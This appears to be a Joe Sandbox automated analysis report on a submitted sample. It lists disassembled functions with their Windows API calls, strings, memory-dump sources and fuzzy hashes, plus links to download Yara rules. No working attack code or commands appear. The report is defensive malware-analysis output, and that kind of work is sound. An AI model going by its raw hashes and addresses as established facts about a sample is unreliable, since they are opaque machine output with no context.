Opcode Fuzzy Hash: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
Instruction Fuzzy Hash: 8021BF32510218ABEF118F94CC42FEA3B79EF49714F100215FA557B1D0E6B9AC51CBA9

Function 0046A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0046A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0046A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0046A956

Strings

msctls_updown32, xrefs: 0046A8BB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction ID: 5f55c68ffc2c420652bad11bb8842fcf2bc24ed935bcb913f205816fc4057d67
Opcode Fuzzy Hash: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
Instruction Fuzzy Hash: 5E21B5B5600609AFDB00DF18CC81D7737ADEF5A358B15045AFA04A7361DB34EC118B66

Function 004699A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00469A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00469A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00469A65

Strings

Listbox, xrefs: 004699FD

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 55abba76bdb70e6f6f0b814dc0b9ec6822e3006a87f819b5f8b7ae85f65f963d
Instruction ID: 3b4956b643eecce6224433c2417d11628b8cdfed21514b37325c140564583a90
Opcode Fuzzy Hash: 55abba76bdb70e6f6f0b814dc0b9ec6822e3006a87f819b5f8b7ae85f65f963d
Instruction Fuzzy Hash: 62210772600118BFDF118F54CC85FBF3BAEEF89760F01812AF94497290D6B59C1187A4

Function 0046A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0046A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0046A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0046A48F

Strings

msctls_trackbar32, xrefs: 0046A444

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction ID: 66ff69cd09a3b487b2c32ef9eb509d7a9d7ee40f74df3f0d23145d62b3b9f1d8
Opcode Fuzzy Hash: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
Instruction Fuzzy Hash: C711E771200208BEEF209F65CC49FEB3769EF89754F014129FA45A6191E6B6E821CB29

Function 00422287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004222A1
GetProcAddress.KERNEL32(00000000), ref: 004222A8

Strings

combase.dll, xrefs: 0042229C
RoInitialize, xrefs: 00422290

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
Instruction ID: 6f86a244cca01810aa437f803786dff7c52cda76eae9428ae4ec3552b341fd87
Opcode Fuzzy Hash: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
Instruction Fuzzy Hash: CEE01270A91300EBDBA06F70ED8EF193B64AB00B06F604875B182E61E0CFBA8040CF1C

Function 0042235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00422276), ref: 00422376
GetProcAddress.KERNEL32(00000000), ref: 0042237D

Strings

combase.dll, xrefs: 00422371
RoUninitialize, xrefs: 00422365

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction ID: c2c24ff20b62a58202260a8ac82467be98224401b9ca7413dff3875aec422145
Opcode Fuzzy Hash: cc2458d9b27f12e467078e358ecd1c04f906aebff1626c1a0176e98f2339ae44
Instruction Fuzzy Hash: 38E09270A46304EFDB61AFA1AD0DF097B64B700706F240835F509921F0CBBA94108B1C

Function 0047AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0047AC60
__swprintf.LIBCMT ref: 0047AC94

Strings

%.3d, xrefs: 0047AC6E
WIN_XPe, xrefs: 0047ACD3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
Instruction ID: 4bb50aad0237944cfab0efe33b29d805611698b4e44c1c58e7d0ac381245c981
Opcode Fuzzy Hash: 1f6b16ccd775b25708ff04193da4216ae97383fb4d251880bbc92f5822d5ef28
Instruction Fuzzy Hash: CDE0ECB1805628AFCA1697509D05DFD737CA784741F5044D3B90AA2014D63D9BAAAB2F

Function 00462205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004621FB,?,004623EF), ref: 00462213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00462225

Strings

GetProcessId, xrefs: 0046221F
kernel32.dll, xrefs: 0046220E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction ID: 394556c6ca59c9a21163b339209c69f1bda373faab45590677b55d6d9d69d704
Opcode Fuzzy Hash: 4672b02b6f7d0dac65ec5901e40b4342e39f77d97c34674ee84bdd586e5f51d9
Instruction Fuzzy Hash: 82D05E34801B12AFC7215B31A90864677D4AF04704B10486FA841A2290E6B8D8808768

Function 004042F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,004042EC,?,004042AA,?), ref: 00404304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404310
kernel32.dll, xrefs: 004042FF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction ID: 8e2625daa83c3a9d930da8d8dbc3e06159fd1fb9ec63ca39b981bd2942dc7d0d
Opcode Fuzzy Hash: 4a37fa3291129964a241e8de426e1356e45d924d261400878f2f182de93ac0a0
Instruction Fuzzy Hash: A0D0A7B0900712AFCB205F21EC0C74677D4AF44701B10483FE941E22F4D7B8C8808728

Function 0040434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004041BB,00404341,?,0040422F,?,004041BB,?,?,?,?,004039FE,?,00000001), ref: 00404359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0040436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404365
kernel32.dll, xrefs: 00404354

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction ID: 3d90eeb04a118de8df55b6892bbe8ede2cd4c825abe2ba33daa0fdaf18675234
Opcode Fuzzy Hash: f18a1eb44fc03b215405c2f488851209d35c2333f536a3cdba6b19ecfb51a2a7
Instruction Fuzzy Hash: C9D0A7B0900712AFC7305F35E80CB4677D4AF10715B10483FE881E22D0D7B8D8808728

Function 00440564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0044052F,?,004406D7), ref: 00440572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00440584

Strings

oleaut32.dll, xrefs: 0044056D
UnRegisterTypeLibForUser, xrefs: 0044057E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction ID: b5979cb841ee170266d89ba9e623a11cea52974f8194418e85b48c4c5a062689
Opcode Fuzzy Hash: e747ec9e98adbaa7c88cbe1a7674578dd7cdd693dc1e62a189552bf39c7ba6c7
Instruction Fuzzy Hash: 43D05E31800712AAD7209F20A80CB5677E4AF04700B20892FE94192294D6B8C4908B28

Function 00440539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0044051D,?,004405FE), ref: 00440547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00440559

Strings

oleaut32.dll, xrefs: 00440542
RegisterTypeLibForUser, xrefs: 00440553

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction ID: 7c59fbfb6b4ca0e17cfd6f52eeb59ceeab1eb4fde61983d69c0c64ea1134d3dc
Opcode Fuzzy Hash: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction Fuzzy Hash: F9D0A730800722AFD720DF20F80C75677E4EF10701B20CC3FE44AD2294D6B8C8808B28

Function 0045ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0045ECBE,?,0045EBBB), ref: 0045ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0045ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0045ECE2
kernel32.dll, xrefs: 0045ECD1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction ID: dcea914721d27dac4ff341c8df08104a786117995b40904736e34123f29db048
Opcode Fuzzy Hash: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction Fuzzy Hash: A6D0A730800723AFCB255F62E84C74777E4AF00701B10883FFC56D2292DBB8C8849B28

Function 0045BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0045BAD3,00000001,0045B6EE,?,0049DC00), ref: 0045BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0045BAFD

Strings

GetModuleHandleExW, xrefs: 0045BAF7
kernel32.dll, xrefs: 0045BAE6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 3b01498c38b39de185afe055707ce5a59db452124adc4e1e91c2b7daaa14a2b7
Instruction ID: d2e0bc0dcdf443ce010d5c4e0a58309edda326cdcd35253c4ce8c4ac77bf30ec
Opcode Fuzzy Hash: 3b01498c38b39de185afe055707ce5a59db452124adc4e1e91c2b7daaa14a2b7
Instruction Fuzzy Hash: AFD05E30C00B129EC730AF22A848B5677D4AF00701B10482FE84392694D7B8D884C768

Function 00463BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00463BD1,?,00463E06), ref: 00463BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00463BFB

Strings

RegDeleteKeyExW, xrefs: 00463BF5
advapi32.dll, xrefs: 00463BE4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5b6f3cb3bccc9e7ad1296aba881979fd5880bfc194b81384b0908bc43ef80c13
Instruction ID: 306718a7605881953b728740fc335e0e7c794a36cff5bcff0d6617268cc744b1
Opcode Fuzzy Hash: 5b6f3cb3bccc9e7ad1296aba881979fd5880bfc194b81384b0908bc43ef80c13
Instruction Fuzzy Hash: 56D05E718007529AC7205FA0A808647BBA4AF15715B20482FE445A2290F7B8C4808B28

Function 00439B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bd9d219209151a27035d08ca3443175f762ac00b484f3d985340d045646e85
Instruction ID: 154cca1ea6a2c2468ec1b562650135d9b531fe59f58d0919810d36f21a6d80cc
Opcode Fuzzy Hash: d6bd9d219209151a27035d08ca3443175f762ac00b484f3d985340d045646e85
Instruction Fuzzy Hash: A1C19C75A0021AEFCB04DF94C885AAEB7B4FF48700F10559AE802EB391D7B4EE41DB94

Function 0045AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0045AAB4
CoUninitialize.OLE32 ref: 0045AABF

Part of subcall function 00440213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B

VariantInit.OLEAUT32(?), ref: 0045AACA
VariantClear.OLEAUT32(?), ref: 0045AD9D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction ID: 5d8e7bca6c7e322d321c672a29ad7db6d4310834907c2f740fef39762054d400
Opcode Fuzzy Hash: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction Fuzzy Hash: ABA17C356047019FC701EF25C481B1AB7E5BF48315F04855EFA969B3A2CB38ED59CB8A

Function 004391CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004391DD
SysAllocString.OLEAUT32(?), ref: 00439286
VariantCopy.OLEAUT32 ref: 004392B5
VariantClear.OLEAUT32(?), ref: 004392DC

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction ID: ca1cb1d64e1576214c9d43b4a1f36021c070d9c51f8d913170cfb391135d6413
Opcode Fuzzy Hash: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction Fuzzy Hash: E851A570A443069BDB24AF66D49166EB3E5EF4C314F20A82FE946D72D1DBBC9C81870D

Function 0046C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(009965B0,?), ref: 0046C544
ScreenToClient.USER32(?,00000002), ref: 0046C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0046C5DA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
